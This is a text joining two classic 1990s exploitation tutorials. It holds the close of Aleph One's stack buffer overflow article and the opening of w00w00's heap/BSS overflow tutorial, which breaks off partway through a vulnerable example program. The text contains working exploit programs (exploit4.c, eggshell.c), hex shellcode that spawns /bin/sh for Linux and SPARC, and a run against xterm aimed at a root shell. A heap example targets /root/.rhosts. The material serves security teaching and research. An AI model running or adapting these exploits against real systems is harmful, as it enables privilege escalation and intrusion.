¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ
Warning: some arguments in previous message were lost
bash$
------------------------------------------------------------------------------
Eureka! Less than a dozen tries and we found the magic numbers. If xterm
where installed suid root this would now be a root shell.
Small Buffer Overflows
~~~~~~~~~~~~~~~~~~~~~~
There will be times when the buffer you are trying to overflow is so
small that either the shellcode wont fit into it, and it will overwrite the
return address with instructions instead of the address of our code, or the
number of NOPs you can pad the front of the string with is so small that the
chances of guessing their address is minuscule. To obtain a shell from these
programs we will have to go about it another way. This particular approach
only works when you have access to the program's environment variables.
What we will do is place our shellcode in an environment variable, and
then overflow the buffer with the address of this variable in memory. This
method also increases your changes of the exploit working as you can make
the environment variable holding the shell code as large as you want.
The environment variables are stored in the top of the stack when the
program is started, any modification by setenv() are then allocated
elsewhere. The stack at the beginning then looks like this:
NULLNULL
Our new program will take an extra variable, the size of the variable
containing the shellcode and NOPs. Our new exploit now looks like this:
exploit4.c
------------------------------------------------------------------------------
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash");
}
------------------------------------------------------------------------------
Lets try our new exploit with our vulnerable test program:
------------------------------------------------------------------------------
[aleph1]$ ./exploit4 768
Using address: 0xbffffdb0
[aleph1]$ ./vulnerable $RET
$
------------------------------------------------------------------------------
Works like a charm. Now lets try it on xterm:
------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit4 2148
Using address: 0xbffffdb0
[aleph1]$ /usr/X11R6/bin/xterm -fg $RET
Warning: Color name
"°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤
ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°
¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿
°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ
¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤
ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°
¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿
°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ
¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤
ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿÿ¿°¤ÿ¿
°¤ÿ¿°¤ÿ¿°¤
Warning: some arguments in previous message were lost
$
------------------------------------------------------------------------------
On the first try! It has certainly increased our odds. Depending how
much environment data the exploit program has compared with the program
you are trying to exploit the guessed address may be to low or to high.
Experiment both with positive and negative offsets.
Finding Buffer Overflows
~~~~~~~~~~~~~~~~~~~~~~~~
As stated earlier, buffer overflows are the result of stuffing more
information into a buffer than it is meant to hold. Since C does not have any
built-in bounds checking, overflows often manifest themselves as writing past
the end of a character array. The standard C library provides a number of
functions for copying or appending strings, that perform no boundary checking.
They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions
operate on null-terminated strings, and do not check for overflow of the
receiving string. gets() is a function that reads a line from stdin into
a buffer until either a terminating newline or EOF. It performs no checks for
buffer overflows. The scanf() family of functions can also be a problem if
you are matching a sequence of non-white-space characters (%s), or matching a
non-empty sequence of characters from a specified set (%[]), and the array
pointed to by the char pointer, is not large enough to accept the whole
sequence of characters, and you have not defined the optional maximum field
width. If the target of any of these functions is a buffer of static size,
and its other argument was somehow derived from user input there is a good
posibility that you might be able to exploit a buffer overflow.
Another usual programming construct we find is the use of a while loop to
read one character at a time into a buffer from stdin or some file until the
end of line, end of file, or some other delimiter is reached. This type of
construct usually uses one of these functions: getc(), fgetc(), or getchar().
If there is no explicit checks for overflows in the while loop, such programs
are easily exploited.
To conclude, grep(1) is your friend. The sources for free operating
systems and their utilities is readily available. This fact becomes quite
interesting once you realize that many comercial operating systems utilities
where derived from the same sources as the free ones. Use the source d00d.
Appendix A - Shellcode for Different Operating Systems/Architectures
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
i386/Linux
------------------------------------------------------------------------------
jmp 0x1f
popl %esi
movl %esi,0x8(%esi)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%esi),%ecx
leal 0xc(%esi),%edx
int $0x80
xorl %ebx,%ebx
movl %ebx,%eax
inc %eax
int $0x80
call -0x24
.string \"/bin/sh\"
------------------------------------------------------------------------------
SPARC/Solaris
------------------------------------------------------------------------------
sethi 0xbd89a, %l6
or %l6, 0x16e, %l6
sethi 0xbdcda, %l7
and %sp, %sp, %o0
add %sp, 8, %o1
xor %o2, %o2, %o2
add %sp, 16, %sp
std %l6, [%sp - 16]
st %sp, [%sp - 8]
st %g0, [%sp - 4]
mov 0x3b, %g1
ta 8
xor %o7, %o7, %o0
mov 1, %g1
ta 8
------------------------------------------------------------------------------
SPARC/SunOS
------------------------------------------------------------------------------
sethi 0xbd89a, %l6
or %l6, 0x16e, %l6
sethi 0xbdcda, %l7
and %sp, %sp, %o0
add %sp, 8, %o1
xor %o2, %o2, %o2
add %sp, 16, %sp
std %l6, [%sp - 16]
st %sp, [%sp - 8]
st %g0, [%sp - 4]
mov 0x3b, %g1
mov -0x1, %l5
ta %l5 + 1
xor %o7, %o7, %o0
mov 1, %g1
ta %l5 + 1
------------------------------------------------------------------------------
Appendix B - Generic Buffer Overflow Program
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
shellcode.h
------------------------------------------------------------------------------
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)
#define NOP_SIZE 4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
unsigned long get_sp(void) {
__asm__("or %sp, %sp, %i0");
}
#elif defined(__sparc__) && defined(__sun__)
#define NOP_SIZE 4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
"\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";
unsigned long get_sp(void) {
__asm__("or %sp, %sp, %i0");
}
#endif
------------------------------------------------------------------------------
eggshell.c
------------------------------------------------------------------------------
/*
* eggshell v1.0
*
* Aleph One / aleph1@underground.org
*/
#include
#include
#include "shellcode.h"
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
void usage(void);
void main(int argc, char *argv[]) {
char *ptr, *bof, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;
while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
switch (c) {
case 'a':
align = atoi(optarg);
break;
case 'b':
bsize = atoi(optarg);
break;
case 'e':
eggsize = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
case '?':
usage();
exit(0);
}
if (strlen(shellcode) > eggsize) {
printf("Shellcode is larger the the egg.\n");
exit(0);
}
if (!(bof = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n",
bsize, eggsize, align);
printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);
addr_ptr = (long *) bof;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
for (n = 0; n < NOP_SIZE; n++) {
m = (n + align) % NOP_SIZE;
*(ptr++) = nop[m];
}
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
bof[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(bof,"BOF=",4);
putenv(bof);
system("/bin/sh");
}
void usage(void) {
(void)fprintf(stderr,
"usage: eggshell [-a ] [-b ] [-e ] [-o ]\n");
}
------------------------------------------------------------------------------
Subject: w00w00 on Heap Overflows
This is a PRELIMINARY BETA VERSION of our final article! We apologize for
any mistakes. We still need to add a few more things.
[ Note: You may also get this article off of ]
[ http://www.w00w00.org/articles.html. ]
w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team
------------------------------------------------------------------------------
Copyright (C) January 1999, Matt Conover & w00w00 Security Development
You may freely redistribute or republish this article, provided the
following conditions are met:
1. This article is left intact (no changes made, the full article
published, etc.)
2. Proper credit is given to its authors; Matt Conover (Shok) and the
w00w00 Security Development (WSD).
You are free to rewrite your own articles based on this material (assuming
the above conditions are met). It'd also be appreciated if an e-mail is
sent to either mattc@repsec.com or shok@dataforce.net to let us know you
are going to be republishing this article or writing an article based upon
one of our ideas.
------------------------------------------------------------------------------
Prelude:
Heap/BSS-based overflows are fairly common in applications today; yet,
they are rarely reported. Therefore, we felt it was appropriate to
present a "heap overflow" tutorial. The biggest critics of this article
will probably be those who argue heap overflows have been around for a
while. Of course they have, but that doesn't negate the need for such
material.
In this article, we will refer to "overflows involving the stack" as
"stack-based overflows" ("stack overflow" is misleading) and "overflows
involving the heap" as "heap-based overflows".
This article should provide the following: a better understanding
of heap-based overflows along with several methods of exploitation,
demonstrations, and some possible solutions/fixes. Prerequisites to
this article: a general understanding of computer architecture,
assembly, C, and stack overflows.
This is a collection of the insights we have gained through our research
with heap-based overflows and the like. We have written all the
examples and exploits included in this article; therefore, the copyright
applies to them as well.
Why Heap/BSS Overflows are Significant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
As more system vendors add non-executable stack patches, or individuals
apply their own patches (e.g., Solar Designer's non-executable stack
patch), a different method of penetration is needed by security
consultants (or else, we won't have jobs!). Let me give you a few
examples:
1. Searching for the word "heap" on BugTraq (for the archive, see
www.geek-girl.com/bugtraq), yields only 40+ matches, whereas
"stack" yields 2300+ matches (though several are irrelevant). Also,
"stack overflow" gives twice as many matches as "heap" does.
2. Solaris (an OS developed by Sun Microsystems), as of Solaris
2.6, sparc Solaris includes a "protect_stack" option, but not an
equivalent "protect_heap" option. Fortunately, the bss is not
executable (and need not be).
3. There is a "StackGuard" (developed by Crispin Cowan et. al.), but
no equivalent "HeapGuard".
4. Using a heap/bss-based overflow was one of the "potential" methods
of getting around StackGuard. The following was posted to BugTraq
by Tim Newsham several months ago:
> Finally the precomputed canary values may be a target
> themselves. If there is an overflow in the data or bss segments
> preceding the precomputed canary vector, an attacker can simply
> overwrite all the canary values with a single value of his
> choosing, effectively turning off stack protection.
5. Some people have actually suggested making a "local" buffer a
"static" buffer, as a fix! This not very wise; yet, it is a fairly
common misconception of how the heap or bss work.
Although heap-based overflows are not new, they don't seem to be well
understood.
Note:
One argument is that the presentation of a "heap-based overflow" is
equivalent to a "stack-based overflow" presentation. However, only a
small proportion of this article has the same presentation (if you
will) that is equivalent to that of a "stack-based overflow".
People go out of their way to prevent stack-based overflows, but leave
their heaps/bss' completely open! On most systems, both heap and bss are
both executable and writeable (an excellent combination). This makes
heap/bss overflows very possible. But, I don't see any reason for the
bss to be executable! What is going to be executed in zero-filled
memory?!
For the security consultant (the ones doing the penetration assessment),
most heap-based overflows are system and architecture independent,
including those with non-executable heaps. This will all be demonstrated
in the "Exploiting Heap/BSS Overflows" section.
Terminology
~~~~~~~~~~~
An executable file, such as ELF (Executable and Linking Format)
executable, has several "sections" in the executable file, such as: the
PLT (Procedure Linking Table), GOT (Global Offset Table), init
(instructions executed on initialization), fini (instructions to be
executed upon termination), and ctors and dtors (contains global
constructors/destructors).
"Memory that is dynamically allocated by the application is known as the
heap." The words "by the application" are important here, as on good
systems most areas are in fact dynamically allocated at the kernel level,
while for the heap, the allocation is requested by the application.
Heap and Data/BSS Sections
~~~~~~~~~~~~~~~~~~~~~~~~~~
The heap is an area in memory that is dynamically allocated by the
application. The data section initialized at compile-time.
The bss section contains uninitialized data, and is allocated at
run-time. Until it is written to, it remains zeroed (or at least from
the application's point-of-view).
Note:
When we refer to a "heap-based overflow" in the sections below, we are
most likely referring to buffer overflows of both the heap and data/bss
sections.
On most systems, the heap grows up (towards higher addresses). Hence,
when we say "X is below Y," it means X is lower in memory than Y.
Exploiting Heap/BSS Overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In this section, we'll cover several different methods to put heap/bss
overflows to use. Most of examples for Unix-dervied x86 systems, will
also work in DOS and Windows (with a few changes). We've also included
a few DOS/Windows specific exploitation methods. An advanced warning:
this will be the longest section, and should be studied the most.
Note:
In this article, I use the "exact offset" approach. The offset
must be closely approximated to its actual value. The alternative is
"stack-based overflow approach" (if you will), where one repeats the
addresses to increase the likelihood of a successful exploit.
While this example may seem unnecessary, we're including it for those who
are unfamiliar with heap-based overflows. Therefore, we'll include this
quick demonstration:
-----------------------------------------------------------------------------
/* demonstrates dynamic overflow in heap (initialized data) */
#include
#include
#include
#include
#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */
int main()
{
u_long diff;
char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);
diff = (u_long)buf2 - (u_long)buf1;
printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff);
memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';
printf("before overflow: buf2 = %s\n", buf2);
memset(buf1, 'B', (u_int)(diff + OVERSIZE));
printf("after overflow: buf2 = %s\n", buf2);
return 0;
}
-----------------------------------------------------------------------------
If we run this, we'll get the following:
[root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA
This works because buf1 overruns its boundaries into buf2's heap space.
But, because buf2's heap space is still valid (heap) memory, the program
doesn't crash.
Note:
A possible fix for a heap-based overflow, which will be mentioned
later, is to put "canary" values between all variables on the heap
space (like that of StackGuard mentioned later) that mustn't be changed
throughout execution.
You can get the complete source to all examples used in this article,
from the file attachment, heaptut.tgz. You can also download this from
our article archive at http://www.w00w00.org/articles.html.
Note:
To demonstrate a bss-based overflow, change line:
from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]'
Yes, that was a very basic example, but we wanted to demonstrate a heap
overflow at its most primitive level. This is the basis of almost
all heap-based overflows. We can use it to overwrite a filename, a
password, a saved uid, etc. Here is a (still primitive) example of
manipulating pointers:
-----------------------------------------------------------------------------
/* demonstrates static pointer overflow in bss (uninitialized data) */
#include
#include
#include
#include
#include
#define BUFSIZE 16
#define ADDRLEN 4 /* # of bytes in an address */
int main()
{
u_long diff;
static char buf[BUFSIZE], *bufptr;
bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;
printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
&bufptr, bufptr, buf, diff, diff);
memset(buf, 'A', (u_int)(diff + ADDRLEN));
printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
&bufptr, bufptr, buf, diff, diff);
return 0;
}
-----------------------------------------------------------------------------
The results:
[root /w00w00/heap/examples/basic]# ./heap3
bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes
When run, one clearly sees that the pointer now points to a different
address. Uses of this? One example is that we could overwrite a
temporary filename pointer to point to a separate string (such as
argv[1], which we could supply ourselves), which could contain
"/root/.rhosts". Hopefully, you are starting to see some potential uses.
To demonstrate this, we will use a temporary file to momentarily save
some input from the user. This is our finished "vulnerable program":
-----------------------------------------------------------------------------
/*
* This is a typical vulnerable program. It will store user input in a
* temporary file.
*
* Compile as: gcc -o vulprog1 vulprog1.c
*/
#include
#include
#include
#include
#include
#define ERROR -1
#define BUFSIZE 16
/*
* Run this vulprog as root or change the "vulfile" to something else.
* Otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/
int main(int argc, char **argv)
{
FILE *tmpfd;
